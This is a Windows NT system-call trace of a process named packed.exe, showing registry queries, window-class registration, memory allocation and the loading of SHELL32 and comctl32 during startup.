 00164   456   NtUserFindExistingCursorIcon  (1241204, 1241220, 1241788, ... ) == 0x10011
 00165   456   NtUserRegisterClassExWOW  (1241724, 1241804, 1241788, 1241820, 679, 128, 0, ... ) == 0x810dc01d
 00166   456   NtUserFindExistingCursorIcon  (1241204, 1241220, 1241788, ... ) == 0x10011
 00167   456   NtUserRegisterClassExWOW  (1241724, 1241804, 1241788, 1241820, 681, 128, 0, ... ) == 0x810dc026
 00168   456   NtUserFindExistingCursorIcon  (1241204, 1241220, 1241788, ... ) == 0x10011
 00169   456   NtUserRegisterClassExWOW  (1241724, 1241804, 1241788, 1241820, 680, 128, 0, ... ) == 0x810dc019
 00170   456   NtUserRegisterClassExWOW  (1241676, 1241756, 1241740, 1241772, 0, 128, 0, ... ) == 0x810dc020
 00171   456   NtUserRegisterClassExWOW  (1241676, 1241752, 1241768, 1241740, 0, 130, 0, ...
 00172   456   NtAllocateVirtualMemory  (-1, 5664768, 0, 4096, 4096, 32, ... 5664768, 4096, ) == 0x0
 00171   456   NtUserRegisterClassExWOW  ... ) == 0x810dc022
 00173   456   NtUserRegisterClassExWOW  (1241676, 1241756, 1241740, 1241772, 0, 128, 0, ... ) == 0x810dc023
 00174   456   NtAllocateVirtualMemory  (-1, 1323008, 0, 4096, 4096, 4, ... 1323008, 4096, ) == 0x0
 00175   456   NtUserRegisterClassExWOW  (1241676, 1241752, 1241768, 1241740, 0, 130, 0, ... ) == 0x810dc024
 00176   456   NtUserRegisterClassExWOW  (1241676, 1241756, 1241740, 1241772, 0, 128, 0, ... ) == 0x810dc025
 00177   456   NtCallbackReturn  (0, 0, 0, ...
 00178   456   NtGdiInit  (... ) == 0x1
 00179   456   NtGdiGetStockObject  (18, ... ) == 0x290001c
 00180   456   NtGdiGetStockObject  (19, ... ) == 0x1b00019
 00181   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Terminal Server"}, ... 48, ) }, ... 48, ) == 0x0
 00182   456   NtQueryValueKey  (48,  (48, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 548, ... TitleIdx=0, Type=4, Data= (48, "TSAppCompat", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00183   456   NtQueryValueKey  (48,  (48, "TSUserEnabled", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 548, ... TitleIdx=0, Type=4, Data= (48, "TSUserEnabled", Partial, 548, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00184   456   NtClose  (48, ... ) == 0x0
 00185   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"}, ... 48, ) }, ... 48, ) == 0x0
 00186   456   NtQueryValueKey  (48,  (48, "LeakTrack", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00187   456   NtClose  (48, ... ) == 0x0
 00188   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\MACHINE"}, ... 48, ) }, ... 48, ) == 0x0
 00189   456   NtSetInformationObject  (48, Handle, {Inherit=0,ProtectFromClose=1,}, 2011365632, ... ) == 0x0
 00190   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\Diagnostics"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00191   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager"}, ... 52, ) }, ... 52, ) == 0x0
 00192   456   NtQueryValueKey  (52,  (52, "SafeDllSearchMode", Partial, 16, ... ) , Partial, 16, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00193   456   NtClose  (52, ... ) == 0x0
 00194   456   NtOpenProcess  (0x400, {24, 0, 0x0, 0, 0, 0x0}, {452, 0}, ... 52, ) == 0x0
 00195   456   NtQueryInformationProcess  (52, Session, 4, ... {SessionId=0,}, 0x0, ) == 0x0
 00196   456   NtClose  (52, ... ) == 0x0
 00197   456   NtUserRegisterWindowMessage  ( ("ShellGetDragImage", ... ) , ... ) == 0xc03a
 00198   456   NtUserSystemParametersInfo  (104, 0, 2000318720, 0, ... ) == 0x1
 00199   456   NtUserSystemParametersInfo  (38, 4, 2000318708, 0, ... ) == 0x1
 00200   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00201   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 52, ) == 0x0
 00202   456   NtQueryInformationToken  (52, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00203   456   NtClose  (52, ... ) == 0x0
 00204   456   NtOpenKey  (0x2000000, {24, 0, 0x640, 0, 0,  (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003"}, ... 52, ) }, ... 52, ) == 0x0
 00205   456   NtSetInformationObject  (52, Handle, {Inherit=0,ProtectFromClose=1,}, 1179904, ... ) == 0x0
 00206   456   NtOpenKey  (0x20019, {24, 52, 0x40, 0, 0,  (0x20019, {24, 52, 0x40, 0, 0, "Control Panel\Desktop"}, ... 56, ) }, ... 56, ) == 0x0
 00207   456   NtQueryValueKey  (56,  (56, "SmoothScroll", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00208   456   NtClose  (56, ... ) == 0x0
 00209   456   NtUserSystemParametersInfo  (41, 500, 1243132, 0, ... ) == 0x1
 00210   456   NtUserSystemParametersInfo  (102, 0, 2000318732, 0, ... ) == 0x1
 00211   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00212   456   NtUserFindExistingCursorIcon  (1242924, 1242940, 1243508, ... ) == 0x10011
 00213   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc03b
 00214   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00215   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc03d
 00216   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00217   456   NtUserFindExistingCursorIcon  (1242924, 1242940, 1243508, ... ) == 0x10011
 00218   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc03f
 00219   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00220   456   NtUserFindExistingCursorIcon  (1242924, 1242940, 1243508, ... ) == 0x10011
 00221   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc041
 00222   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00223   456   NtUserFindExistingCursorIcon  (1242924, 1242940, 1243508, ... ) == 0x10011
 00224   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc043
 00225   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00226   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc045
 00227   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00228   456   NtUserFindExistingCursorIcon  (1242924, 1242940, 1243508, ... ) == 0x10011
 00229   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc047
 00230   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00231   456   NtUserFindExistingCursorIcon  (1242920, 1242936, 1243504, ... ) == 0x10011
 00232   456   NtUserRegisterClassExWOW  (1243372, 1243452, 1243436, 1243468, 0, 384, 0, ... ) == 0x810dc049
 00233   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00234   456   NtUserFindExistingCursorIcon  (1242924, 1242940, 1243508, ... ) == 0x10011
 00235   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc04b
 00236   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00237   456   NtUserFindExistingCursorIcon  (1242924, 1242940, 1243508, ... ) == 0x10011
 00238   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc04d
 00239   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00240   456   NtUserFindExistingCursorIcon  (1242924, 1242940, 1243508, ... ) == 0x10011
 00241   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc04f
 00242   456   NtUserGetClassInfo  (1999896576, 1243544, 1243496, 1243572, 0, ... ) == 0x0
 00243   456   NtUserRegisterClassExWOW  (1243380, 1243460, 1243444, 1243476, 0, 384, 0, ... ) == 0x810dc051
 00244   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00245   456   NtUserFindExistingCursorIcon  (1242924, 1242940, 1243508, ... ) == 0x10011
 00246   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc053
 00247   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00248   456   NtUserFindExistingCursorIcon  (1242924, 1242940, 1243508, ... ) == 0x10011
 00249   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc055
 00250   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc057
 00251   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00252   456   NtUserFindExistingCursorIcon  (1242924, 1242940, 1243508, ... ) == 0x10011
 00253   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc059
 00254   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00255   456   NtUserFindExistingCursorIcon  (1242924, 1242940, 1243508, ... ) == 0x10013
 00256   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc05b
 00257   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00258   456   NtUserFindExistingCursorIcon  (1242924, 1242940, 1243508, ... ) == 0x10011
 00259   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc05d
 00260   456   NtUserGetClassInfo  (1999896576, 1243540, 1243492, 1243568, 0, ... ) == 0x0
 00261   456   NtUserFindExistingCursorIcon  (1242924, 1242940, 1243508, ... ) == 0x10011
 00262   456   NtUserRegisterClassExWOW  (1243376, 1243456, 1243440, 1243472, 0, 384, 0, ... ) == 0x810dc05f
 00263   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00264   456   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 8781824, 65536, ) == 0x0
 00265   456   NtAllocateVirtualMemory  (-1, 8781824, 0, 4096, 4096, 4, ... 8781824, 4096, ) == 0x0
 00266   456   NtAllocateVirtualMemory  (-1, 8785920, 0, 8192, 4096, 4, ... 8785920, 8192, ) == 0x0
 00267   456   NtOpenSection  (0x4, {24, 0, 0x40, 0, 0,  (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionCType"}, ... 56, ) }, ... 56, ) == 0x0
 00268   456   NtMapViewOfSection  (56, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x870000), 0x0, 12288, ) == 0x0
 00269   456   NtClose  (56, ... ) == 0x0
 00270   456   NtAllocateVirtualMemory  (-1, 8794112, 0, 4096, 4096, 4, ... 8794112, 4096, ) == 0x0
 00271   456   NtOpenKey  (0x2000000, {24, 48, 0x40, 0, 0,  (0x2000000, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Performance"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00272   456   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "SYSTEM\Setup"}, ... 56, ) }, ... 56, ) == 0x0
 00273   456   NtQueryValueKey  (56,  (56, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (56, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00274   456   NtClose  (56, ... ) == 0x0
 00275   456   NtQueryDefaultUILanguage  (1241756, ...
 00276   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00277   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... -2147482028, ) == 0x0
 00278   456   NtQueryInformationToken  (-2147482028, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00279   456   NtClose  (-2147482028, ... ) == 0x0
 00280   456   NtOpenKey  (0x2000000, {24, 0, 0x640, 0, 0,  (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003"}, ... -2147482028, ) }, ... -2147482028, ) == 0x0
 00281   456   NtOpenKey  (0x80000000, {24, 0, 0x240, 0, 0,  (0x80000000, {24, 0, 0x240, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Nls\MUILanguages"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00282   456   NtOpenKey  (0x80000000, {24, -2147482028, 0x640, 0, 0,  (0x80000000, {24, -2147482028, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147482020, ) }, ... -2147482020, ) == 0x0
 00283   456   NtQueryValueKey  (-2147482020,  (-2147482020, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00284   456   NtClose  (-2147482020, ... ) == 0x0
 00285   456   NtClose  (-2147482028, ... ) == 0x0
 00275   456   NtQueryDefaultUILanguage  ... ) == 0x0
 00286   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Nls\MUILanguages"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00287   456   NtQueryInstallUILanguage  (2012047340, ... ) == 0x0
 00288   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\SHELL32.dll"}, 1, 96, ... 56, {status=0x0, info=1}, ) }, 1, 96, ... 56, {status=0x0, info=1}, ) == 0x0
 00289   456   NtCreateSection  (0x4, 0x0, 0x0, 2, 134217728, 56, ... 60, ) == 0x0
 00290   456   NtMapViewOfSection  (60, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 2, ... (0x880000), 0x0, 8323072, ) == 0x0
 00291   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\SHELL32.dll.124.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00292   456   NtQueryDefaultUILanguage  (2013024600, ...
 00293   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00294   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... -2147482028, ) == 0x0
 00295   456   NtQueryInformationToken  (-2147482028, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00296   456   NtClose  (-2147482028, ... ) == 0x0
 00297   456   NtOpenKey  (0x2000000, {24, 0, 0x640, 0, 0,  (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003"}, ... -2147482028, ) }, ... -2147482028, ) == 0x0
 00298   456   NtOpenKey  (0x80000000, {24, 0, 0x240, 0, 0,  (0x80000000, {24, 0, 0x240, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Nls\MUILanguages"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00299   456   NtOpenKey  (0x80000000, {24, -2147482028, 0x640, 0, 0,  (0x80000000, {24, -2147482028, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147482020, ) }, ... -2147482020, ) == 0x0
 00300   456   NtQueryValueKey  (-2147482020,  (-2147482020, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00301   456   NtClose  (-2147482020, ... ) == 0x0
 00302   456   NtClose  (-2147482028, ... ) == 0x0
 00292   456   NtQueryDefaultUILanguage  ... ) == 0x0
 00303   456   NtAllocateVirtualMemory  (-1, 1228800, 0, 4096, 4096, 260, ... 1228800, 4096, ) == 0x0
 00304   456   NtQueryInstallUILanguage  (2013024602, ... ) == 0x0
 00305   456   NtQueryDefaultLocale  (1, 1239792, ... ) == 0x0
 00306   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\SHELL32.dll.124.Config"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00307   456   NtRequestWaitReplyPort  (24, {128, 156, new_msg, 0, 1240648, 1, 96, 0}  (24, {128, 156, new_msg, 0, 1240648, 1, 96, 0} "\210\6\31\1\33\0\1\0\0\0\0\0\1\361\22\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\18\0\0\0\377\377\377\377\0\0\0\0\20\311\277\0\0\0\0\0\236\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0H\365\22\0\0\0\0\0" ... {128, 156, reply, 0, 452, 456, 1507, 0} " S\26\0\33\0\1\0\0\0\0\0\1\361\22\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\18\0\0\0\377\377\377\377\0\0\0\0\20\311\277\0\0\0\0\0\236\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0H\365\22\0\0\0\0\0" )  ... {128, 156, reply, 0, 452, 456, 1507, 0}  (24, {128, 156, new_msg, 0, 1240648, 1, 96, 0} "\210\6\31\1\33\0\1\0\0\0\0\0\1\361\22\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\18\0\0\0\377\377\377\377\0\0\0\0\20\311\277\0\0\0\0\0\236\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0H\365\22\0\0\0\0\0" ... {128, 156, reply, 0, 452, 456, 1507, 0} " S\26\0\33\0\1\0\0\0\0\0\1\361\22\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6\31\18\0\0\0\377\377\377\377\0\0\0\0\20\311\277\0\0\0\0\0\236\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0H\365\22\0\0\0\0\0" )  ) == 0x0
 00308   456   NtClose  (56, ... ) == 0x0
 00309   456   NtClose  (60, ... ) == 0x0
 00310   456   NtUnmapViewOfSection  (-1, 0x880000, ... ) == 0x0
 00311   456   NtUnmapViewOfSection  (-1, 0x12f548, ... ) == STATUS_NOT_MAPPED_VIEW
 00312   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 00313   456   NtAllocateVirtualMemory  (-1, 1327104, 0, 4096, 4096, 4, ... 1327104, 4096, ) == 0x0
 00314   456   NtOpenKey  (0x8, {24, 0, 0x40, 0, 0,  (0x8, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00315   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 00316   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 00317   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe.Local\"}, 1238876, ... ) }, 1238876, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00318   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 00319   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 00320   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 00321   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a"}, 1239468, ... ) }, 1239468, ... ) == 0x0
 00322   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a"}, 3, 33, ... 60, {status=0x0, info=1}, ) }, 3, 33, ... 60, {status=0x0, info=1}, ) == 0x0
 00323   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 00324   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll"}, 5, 96, ... 56, {status=0x0, info=1}, ) }, 5, 96, ... 56, {status=0x0, info=1}, ) == 0x0
 00325   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 56, ... 64, ) == 0x0
 00326   456   NtClose  (56, ... ) == 0x0
 00327   456   NtMapViewOfSection  (64, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x880000), 0x0, 921600, ) == 0x0
 00328   456   NtClose  (64, ... ) == 0x0
 00329   456   NtUnmapViewOfSection  (-1, 0x880000, ... ) == 0x0
 00330   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll"}, 5, 96, ... 64, {status=0x0, info=1}, ) }, 5, 96, ... 64, {status=0x0, info=1}, ) == 0x0
 00331   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 64, ... 56, ) == 0x0
 00332   456   NtQuerySection  (56, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 00333   456   NtOpenProcessToken  (-1, 0x8, ... 68, ) == 0x0
 00334   456   NtQueryInformationToken  (68, User, 136, ... {token info, class 1, size 36}, 36, ) == 0x0
 00335   456   NtOpenKey  (0x3, {24, 0, 0x40, 0, 0,  (0x3, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\SafeBoot\Option"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00336   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 72, ) }, ... 72, ) == 0x0
 00337   456   NtQueryValueKey  (72,  (72, "TransparentEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 80, ... TitleIdx=0, Type=4, Data= (72, "TransparentEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 00338   456   NtClose  (72, ... ) == 0x0
 00339   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00340   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 72, ) == 0x0
 00341   456   NtQueryInformationToken  (72, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00342   456   NtClose  (72, ... ) == 0x0
 00343   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00344   456   NtClose  (68, ... ) == 0x0
 00345   456   NtClose  (64, ... ) == 0x0
 00346   456   NtMapViewOfSection  (56, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71950000), 0x0, 933888, ) == 0x0
 00347   456   NtClose  (56, ... ) == 0x0
 00348   456   NtProtectVirtualMemory  (-1, (0x71951000), 1952, 4, ... (0x71951000), 4096, 32, ) == 0x0
 00349   456   NtProtectVirtualMemory  (-1, (0x71951000), 4096, 32, ... (0x71951000), 4096, 4, ) == 0x0
 00350   456   NtFlushInstructionCache  (-1, 1905594368, 1952, ... ) == 0x0
 00351   456   NtProtectVirtualMemory  (-1, (0x71951000), 1952, 4, ... (0x71951000), 4096, 32, ) == 0x0
 00352   456   NtProtectVirtualMemory  (-1, (0x71951000), 4096, 32, ... (0x71951000), 4096, 4, ) == 0x0
 00353   456   NtFlushInstructionCache  (-1, 1905594368, 1952, ... ) == 0x0
 00354   456   NtProtectVirtualMemory  (-1, (0x71951000), 1952, 4, ... (0x71951000), 4096, 32, ) == 0x0
 00355   456   NtProtectVirtualMemory  (-1, (0x71951000), 4096, 32, ... (0x71951000), 4096, 4, ) == 0x0
 00356   456   NtFlushInstructionCache  (-1, 1905594368, 1952, ... ) == 0x0
 00357   456   NtProtectVirtualMemory  (-1, (0x71951000), 1952, 4, ... (0x71951000), 4096, 32, ) == 0x0
 00358   456   NtProtectVirtualMemory  (-1, (0x71951000), 4096, 32, ... (0x71951000), 4096, 4, ) == 0x0
 00359   456   NtFlushInstructionCache  (-1, 1905594368, 1952, ... ) == 0x0
 00360   456   NtProtectVirtualMemory  (-1, (0x71951000), 1952, 4, ... (0x71951000), 4096, 32, ) == 0x0
 00361   456   NtProtectVirtualMemory  (-1, (0x71951000), 4096, 32, ... (0x71951000), 4096, 4, ) == 0x0
 00362   456   NtFlushInstructionCache  (-1, 1905594368, 1952, ... ) == 0x0
 00363   456   NtProtectVirtualMemory  (-1, (0x71951000), 1952, 4, ... (0x71951000), 4096, 32, ) == 0x0
 00364   456   NtProtectVirtualMemory  (-1, (0x71951000), 4096, 32, ... (0x71951000), 4096, 4, ) == 0x0
 00365   456   NtFlushInstructionCache  (-1, 1905594368, 1952, ... ) == 0x0
 00366   456   NtProtectVirtualMemory  (-1, (0x71951000), 1952, 4, ... (0x71951000), 4096, 32, ) == 0x0
 00367   456   NtProtectVirtualMemory  (-1, (0x71951000), 4096, 32, ... (0x71951000), 4096, 4, ) == 0x0
 00368   456   NtFlushInstructionCache  (-1, 1905594368, 1952, ... ) == 0x0
 00369   456   NtAddAtom  ( ("T\0h\0e\0m\0e\0P\0r\0o\0p\0S\0c\0r\0o\0l\0l\0B\0a\0r\0C\0t\0l\0", 42, 1240652, ... ) , 42, 1240652, ... ) == 0x0
 00370   456   NtQueryDefaultUILanguage  (1239368, ...
 00371   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00372   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... -2147482028, ) == 0x0
 00373   456   NtQueryInformationToken  (-2147482028, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00374   456   NtClose  (-2147482028, ... ) == 0x0
